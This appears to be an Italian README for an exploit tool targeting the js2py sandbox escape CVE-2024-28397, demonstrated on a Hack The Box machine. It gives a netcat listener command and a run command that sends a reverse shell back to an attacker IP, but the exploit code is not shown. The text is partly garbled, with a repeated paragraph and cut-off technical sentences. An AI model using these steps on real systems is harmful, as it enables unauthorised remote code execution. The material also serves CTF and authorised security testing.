
Uno script di automazione in Python per sfruttare la vulnerabilità **js2py Sandbox Escape** (CVE-2024-28397). Questo strumento automatizza il processo di generazione e consegna del payload per ottenere l'esecuzione remota di codice (RCE) su istanze vulnerabili.
Uno script di automazione in Python per sfruttare la vulnerabilità js2py Sandbox Escape (CVE-2024-28397). Questo strumento automatizza il processo di generazione e consegna del payload per ottenere l'esecuzione remota di codice (RCE) su istanze vulnerabili.
⚠️ Disclaimer Legale L'utilizzo di questo strumento per attaccare obiettivi senza il preventivo consenso reciproco è illegale. Questo repository è esclusivamente a scopo educativo. L'autore non è responsabile di qualsiasi uso improprio di queste informazioni. Questo strumento è pensato per essere utilizzato in valutazioni di sicurezza autorizzate e in ambienti Capture The Flag (CTF).
CVE-2024-28397 riguarda la libreria js2py (versioni < 0.74). La libreria non riesce a isolare correttamente l'ambiente JavaScript dall'ambiente Python host.
__class__ e __subclasses__.subprocess.Popen, consentendo l'esecuzione arbitraria di comandi sul server host.pip install requests
Avvia il tuo listener Netcat :
nc -lvnp 1337
Esegui lo script :
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>
Ecco lo strumento in azione contro un target vulnerabile (Hack The Box - CodeTwo):
Esecuzione dell'exploit per generare il payload e attivare la callback:

Ricezione della reverse shell sul listener:
